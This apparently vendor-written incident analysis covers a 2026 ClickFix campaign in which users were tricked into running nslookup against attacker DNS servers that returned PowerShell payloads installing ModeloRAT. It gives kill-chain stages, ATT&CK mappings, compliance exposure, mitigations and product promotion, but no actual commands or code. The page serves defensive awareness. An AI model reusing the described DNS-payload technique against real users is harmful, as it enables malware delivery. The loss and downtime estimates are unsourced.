How did attackers exploit DNS in the ClickFix attack?

They tricked users into running 'nslookup' commands that queried attacker-controlled DNS servers, which responded with malicious PowerShell scripts.

What measures can prevent such DNS-based attacks?

Implementing DNS traffic monitoring, restricting execution of unsolicited commands, and educating users about social engineering tactics can help prevent such attacks.

Understanding the 2026 ClickFix DNS PowerShell Attack

A deep dive into the sophisticated ClickFix attack that exploited DNS queries to deliver malware via PowerShell scripts.

Published: February 17, 2026

Share this on:

Executive Summary

In February 2026, a new variant of the ClickFix social engineering attack emerged, exploiting DNS queries to deliver malicious payloads. Attackers deceived users into executing an 'nslookup' command via the Windows Run dialog, which queried an attacker-controlled DNS server. The server responded with a DNS record containing a malicious PowerShell script, leading to the installation of malware, including the remote access trojan ModeloRAT. This method allowed attackers to blend malicious activities within normal DNS traffic, evading traditional detection mechanisms.

This incident underscores the evolving sophistication of social engineering attacks, highlighting the need for heightened awareness and advanced security measures. The use of DNS as a delivery mechanism signifies a shift in attacker tactics, emphasizing the importance of monitoring DNS traffic and educating users about the risks of executing unsolicited commands.

Why This Matters Now

The exploitation of DNS queries in ClickFix attacks represents a significant evolution in cyber threats, making it imperative for organizations to enhance their security protocols and user training to prevent such sophisticated social engineering tactics.

Attack Path Analysis

The attack began with a social engineering tactic where victims were deceived into executing a malicious command via the Windows Run dialog, initiating a DNS query to an attacker-controlled server. This query returned a response containing a PowerShell script, which was executed to download additional malware, including a Python runtime and scripts for reconnaissance. The malware established persistence by creating startup entries and ultimately deployed ModeloRAT, a remote access trojan, granting attackers control over the compromised system.

Kill Chain Progression

Initial Compromise

High

Privilege Escalation

Medium

Lateral Movement

Mediuminferred

Command & Control

High

Exfiltration

Lowinferred

Impact

Lowinferred

Initial Compromise

Description

Victims were tricked into running a command that performed a DNS lookup to an attacker-controlled server, retrieving and executing a malicious PowerShell script.

Confidence:

High

MITRE ATT&CK® Techniques

Techniques identified for SEO/filtering; may be expanded with full STIX/TAXII enrichment later.

Execution

T1204.002

User Execution: Malicious File

Command and Control

T1071.004

Application Layer Protocol: DNS

Execution

T1059.001

Command and Scripting Interpreter: PowerShell

Execution

T1059.003

Command and Scripting Interpreter: Windows Command Shell

Persistence

T1547.001

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Discovery

T1082

System Information Discovery

Command and Control

T1105

Ingress Tool Transfer

Potential Compliance Exposure

Mapping incident impact across multiple compliance frameworks.

PCI DSS 4.0 – Malicious Software Prevention

Control ID: 6.4.1

The attack exploited user execution of malicious commands, indicating a failure in preventing and detecting malicious software.

NYDFS 23 NYCRR 500 – Cybersecurity Policy

Control ID: 500.03

The incident suggests deficiencies in the cybersecurity policy, particularly in user training and response to social engineering attacks.

DORA – ICT Risk Management Framework

Control ID: Article 5

The use of DNS for command and control highlights gaps in the ICT risk management framework, especially in monitoring and controlling network traffic.

CISA ZTMM 2.0 – User Training and Awareness

Control ID: 3.1

The success of the social engineering component indicates insufficient user training and awareness programs.

NIS2 Directive – Cybersecurity Risk Management Measures

Control ID: Article 21

The incident reveals shortcomings in implementing appropriate cybersecurity risk management measures, particularly in detecting and mitigating DNS-based threats.

Sector Implications

Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.

Financial Services

ClickFix DNS-based social engineering attacks threaten customer financial data through PowerShell malware delivery, bypassing traditional web security controls and enabling credential theft.

Information Technology/IT

DNS-based ClickFix attacks exploit IT infrastructure trust relationships, delivering ModeloRAT malware through legitimate nslookup commands while evading network security monitoring systems.

Computer Software/Engineering

Social engineering attacks targeting software developers through malicious DNS responses compromise source code repositories and development environments via PowerShell-based remote access trojans.

Health Care / Life Sciences

ClickFix DNS attacks threaten HIPAA compliance by installing reconnaissance malware that can access patient data systems through compromised administrative workstations.

Sources

New ClickFix attack abuses nslookup to retrieve PowerShell payload via DNShttps://www.bleepingcomputer.com/news/security/new-clickfix-attack-abuses-nslookup-to-retrieve-powershell-payload-via-dns/
Verified

Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staginghttps://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html

Verified

CrashFix: Malicious NexShield Chrome Extension Forces Users To Install ModeloRAT Via PowerShellhttps://cybersecurefox.com/en/crashfix-nexshield-chrome-extension-modelorat-attack/

Verified

Frequently Asked Questions

It's a 2026 cyberattack where attackers used DNS queries to deliver malicious PowerShell scripts, leading to malware installations like ModeloRAT.

Cloud Native Security Fabric Mitigations and ControlsCNSF

Aviatrix Zero Trust CNSF is pertinent to this incident as it could have limited the attacker's ability to move laterally and exfiltrate data by enforcing strict segmentation and identity-aware policies.

Initial Compromise

Control: Cloud Native Security Fabric (CNSF)

Mitigation: The attacker's ability to execute unauthorized scripts would likely be constrained, reducing the risk of initial compromise.

Privilege Escalation

Control: Zero Trust Segmentation

Mitigation: The attacker's ability to escalate privileges and establish persistence would likely be constrained, reducing the risk of further compromise.

Lateral Movement

Control: East-West Traffic Security

Mitigation: The attacker's ability to move laterally within the network would likely be constrained, reducing the risk of further compromise.

Command & Control

Control: Multicloud Visibility & Control

Mitigation: The attacker's ability to establish and maintain command and control channels would likely be constrained, reducing the risk of remote control over compromised systems.

Exfiltration

Control: Egress Security & Policy Enforcement

Mitigation: The attacker's ability to exfiltrate data would likely be constrained, reducing the risk of data loss.

Impact (Mitigations)

The attacker's ability to cause significant impact would likely be constrained, reducing the risk of data theft, system manipulation, or further malware deployment.

Impact at a Glance

Affected Business Functions

IT Operations
Network Security
Endpoint Management

Operational Disruption

Estimated downtime: 3 days

Financial Impact

Estimated loss: $50,000

Data Exposure

Potential exposure of sensitive corporate data due to remote access capabilities of ModeloRAT.

Recommended Actions

• Implement DNS security solutions to detect and block malicious DNS queries, preventing the retrieval of payloads via DNS.
• Enforce strict egress filtering policies to control outbound traffic and prevent unauthorized communications with attacker-controlled servers.
• Utilize zero trust segmentation to limit lateral movement by restricting communication between workloads based on identity and policy.
• Deploy threat detection and anomaly response systems to identify and respond to unusual activities indicative of compromise.
• Educate users on social engineering tactics to reduce the likelihood of successful phishing attacks leading to initial compromise.

Secure the Paths Between Cloud Workloads

A cloud-native security fabric that enforces Zero Trust across workload communication—reducing attack paths, compliance risk, and operational complexity.

Stop Advanced Threats Get a Free Workload Attack Path Assessment Under Active Attack?

Understanding the 2026 ClickFix DNS PowerShell Attack

Executive Summary

Why This Matters Now

Attack Path Analysis

Kill Chain Progression

Initial Compromise

Description

MITRE ATT&CK® Techniques

User Execution: Malicious File

Application Layer Protocol: DNS

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: Windows Command Shell

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

System Information Discovery

Ingress Tool Transfer

Potential Compliance Exposure

PCI DSS 4.0 – Malicious Software Prevention

NYDFS 23 NYCRR 500 – Cybersecurity Policy

DORA – ICT Risk Management Framework

CISA ZTMM 2.0 – User Training and Awareness

NIS2 Directive – Cybersecurity Risk Management Measures

Sector Implications

Financial Services

Information Technology/IT

Computer Software/Engineering

Health Care / Life Sciences

Sources

Frequently Asked Questions

Cloud Native Security Fabric Mitigations and ControlsCNSF

Impact at a Glance

Affected Business Functions

Recommended Actions

Key Takeaways & Next Steps

Secure the Paths Between Cloud Workloads